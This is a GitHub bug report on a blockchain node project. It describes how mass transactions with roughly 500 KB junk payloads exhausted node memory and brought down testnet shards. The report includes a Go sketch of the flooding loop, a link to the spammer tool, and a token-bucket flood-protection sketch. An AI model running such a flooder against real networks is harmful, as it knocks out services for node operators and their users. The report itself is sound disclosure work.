
Mass tx spam results in nodes using an excessive amount of memory (and eventually getting OOM reaped) #799

Closed
chainum opened this issue Dec 12, 2019 · 1 comment
Labels
type:bug Something isn't working

Comments

chainum commented Dec 12, 2019

Describe the bug
I wrote a tx sender/spammer tool that sends a lot of transactions with massive payloads, and I unleashed it very briefly on the network to test my code.

The payload alternated between the 4chan Navy Seal copypasta (499,500 bytes) and a base64-encoded image of the legendary Mr Bubz (126,896 bytes). The larger payload (499,500 bytes) was primarily used, for better effect.

Even minor testing of this tool seems to have been sufficient to bring down shards 0, 1, 2 and 3. Some of my nodes sent about 200-400 mb/s of data while the tool was active.

What I'm assuming happened is that the sheer number of transactions, combined with the large payloads, led nodes to use a massive amount of memory for their pending tx pools/queues. Eventually some nodes allocated way too much memory and the OS stepped in to OOM reap them.
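
For a rough sense of scale, the payload bytes alone add up very quickly. The sender throughput below is a hypothetical figure chosen purely for illustration, not a measurement from my runs:

```go
// Back-of-envelope estimate of raw payload bytes sitting in a pending tx pool.
// txPerSecond is a hypothetical sustained rate, not a measured one.
package main

import "fmt"

func main() {
	const payloadBytes = 499_500 // the larger payload used by the tool
	const txPerSecond = 200      // hypothetical sustained sender throughput
	const seconds = 60

	pending := txPerSecond * seconds
	gb := float64(pending) * payloadBytes / 1e9
	fmt.Printf("%d pending txs ≈ %.1f GB of raw payload data\n", pending, gb)
	// => 12000 pending txs ≈ 6.0 GB, before per-tx bookkeeping overhead,
	//    gossip duplication across peers, or per-shard copies of the pool.
}
```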

This eventually led to some shards not being able to form consensus because too many nodes had been shut down / were offline. It also seems that some of Elrond's internal nodes were affected / OOM reaped because of the exploit.

This attack is very similar to what I also did on Harmony's Pangaea testnet.

To Reproduce
Steps to reproduce the behavior:

  1. See https://github.com/SebastianJ/elrond-tx-sender/ for usage instructions
  2. Given that some values are currently hard-coded (I was a bit pressed for time to report this ASAP), some code changes might be needed; a rough sketch of the sending pattern is included below. I will make the tool more configurable as soon as this ticket has been submitted.
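
For reference, the core of the tool is just a tight sending loop. The sketch below is illustrative only: the endpoint, tx fields and values are assumptions (and real transactions must be signed, which is omitted); see the linked repo for the actual implementation.

```go
// Illustrative only: floods a node with transactions carrying a ~500 KB payload.
// The /transaction/send endpoint and the tx schema here are assumptions.
package main

import (
	"bytes"
	"encoding/json"
	"net/http"
	"strings"
)

func main() {
	nodeURL := "http://localhost:8080/transaction/send"       // hypothetical node REST endpoint
	payload := strings.Repeat("NAVY SEAL COPYPASTA ", 25_000) // ~500 KB of junk data

	for nonce := uint64(0); ; nonce++ {
		tx := map[string]interface{}{ // illustrative, unsigned tx fields
			"nonce":    nonce,
			"sender":   "erd1...sender",   // placeholder address
			"receiver": "erd1...receiver", // placeholder address
			"value":    "1",
			"gasPrice": 100000000000,
			"gasLimit": 500000000,
			"data":     payload,
		}
		body, _ := json.Marshal(tx)
		resp, err := http.Post(nodeURL, "application/json", bytes.NewReader(body))
		if err != nil {
			continue // keep hammering even on transient errors
		}
		resp.Body.Close()
	}
}
```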

Expected behavior
The network and nodes should clearly be able to cope with this better, ideally by using some kind of throughput throttling or flood protection (which I've heard is already on the way or fully implemented, but not yet deployed on BoN).
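
For context, one common shape such flood protection can take (this is only a sketch of the general idea, not the component mentioned here) is a per-peer token bucket that charges each message by its size, so oversized payloads drain a peer's budget quickly. Using golang.org/x/time/rate:

```go
// Sketch of per-peer throughput throttling via token buckets; not Elrond's design.
package main

import (
	"fmt"
	"sync"
	"time"

	"golang.org/x/time/rate"
)

type floodGuard struct {
	mu     sync.Mutex
	peers  map[string]*rate.Limiter
	perSec rate.Limit // sustained bytes/second allowed per peer
	burst  int        // maximum bytes accepted in a burst
}

func newFloodGuard(perSec rate.Limit, burst int) *floodGuard {
	return &floodGuard{peers: make(map[string]*rate.Limiter), perSec: perSec, burst: burst}
}

// allow reports whether a message of sizeBytes from peerID should be accepted.
func (g *floodGuard) allow(peerID string, sizeBytes int) bool {
	g.mu.Lock()
	lim, ok := g.peers[peerID]
	if !ok {
		lim = rate.NewLimiter(g.perSec, g.burst)
		g.peers[peerID] = lim
	}
	g.mu.Unlock()
	// Charging by message size means large payloads exhaust the bucket fast.
	return lim.AllowN(time.Now(), sizeBytes)
}

func main() {
	// Illustrative limits: ~1 MB/s sustained per peer, 2 MB burst.
	guard := newFloodGuard(rate.Limit(1_000_000), 2_000_000)
	for i := 0; i < 5; i++ {
		// The first four ~500 KB txs fit in the burst; the fifth is rejected.
		fmt.Println(guard.allow("spammy-peer", 499_500))
	}
}
```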

iulianpascalau (Contributor) commented

👍 Great job creating such a tool! We are currently heavily developing an anti-flooding component for the node. We can hardly wait to retest this once the patch is released.
